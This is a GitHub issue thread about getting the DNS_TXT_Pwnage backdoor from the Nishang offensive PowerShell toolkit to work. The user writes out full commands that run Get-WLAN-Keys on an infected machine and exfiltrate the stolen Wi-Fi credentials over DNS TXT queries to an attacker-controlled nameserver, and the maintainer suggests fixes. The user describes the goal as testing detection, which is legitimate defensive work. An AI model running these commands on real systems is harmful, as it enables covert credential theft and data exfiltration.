### ISSUE TITLE
difficulty in doing DNS TXT exfiltration

### ISSUE THREAD

**Issue by totoroha** [samratashok/nishang#46]
_DNS_TXT_Pwnage -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop
---> The above command gave me the list of process of infected machine.

However, when i started to use this command for exfiltrate the data, i got an error as "Can't find server address for 'DNS'"
 _DNS_TXT_Pwnage -StartDomain  start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com

I created private nameservers, and changed the default nameservers of domain to ns1.abc.com and ns2.abc.com
This is the command that i ran, and the message is "Request to UnKnown timed-out"

DNS_TXT_Pwnage -AuthNS ns1.abc.com -StartDomain  start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com

Would anyone please tell me where i am wrong?

**Comment by totoroha** [comment]
can anyone help me with this? i want to test it in our environment to see if we can detect it but i stucked right there.

**Comment by samratashok** [comment]
Just tested and it looks fine. Just to be sure, can you move the AuthNS parameter to the end of the command:
DNS_TXT_Pwnage -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com -AuthNS ns1.abc.com

**Comment by totoroha** [comment]
so in that case, what did you do for the nameservers that made this work. cause in my case, i don't use zoneedit.com as the domain service and hosting service too.

**Comment by samratashok** [comment]
Did you try moving the AuthNS parameter to the end?

**Comment by totoroha** [comment]
I did.

**Comment by samratashok** [comment]
What is the output of "nslookup -querytype=txt 5ZsHuBsf0prP3BtsEZxasMFfk42K14uw+JdZ4feCBeN2PLlmiVkyeTAWK1iUKsk.abc.com" ?

**Comment by samratashok** [comment]
Closing. No response received. Assuming fixed.
